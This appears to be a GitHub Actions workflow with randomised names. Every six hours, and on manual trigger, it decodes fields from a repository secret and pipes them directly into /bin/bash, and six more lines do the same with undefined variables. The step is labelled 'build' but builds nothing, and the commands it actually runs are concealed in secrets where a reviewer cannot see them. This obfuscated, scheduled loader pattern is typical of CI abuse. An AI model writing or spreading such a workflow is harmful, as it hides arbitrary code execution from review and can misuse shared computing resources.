name: zhaozilong7182

on:
  workflow_dispatch:
  schedule:
    - cron: '42 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaozilong7182
        env:
          g32: ${{ secrets.g32 }}
        run: |
          echo $g32 | jq -r .dcj8225 | /bin/bash
          echo $vl59400 | jq -r .pukdi8752 | /bin/bash
          echo $c6 | jq -r .nlfd58512 | /bin/bash
          echo $pb7 | jq -r .r20 | /bin/bash
          echo $sjb9885 | jq -r .o4548 | /bin/bash
          echo $ofzj181 | jq -r .rlr04 | /bin/bash
          echo $rcbuq1598 | jq -r .o9 | /bin/bash

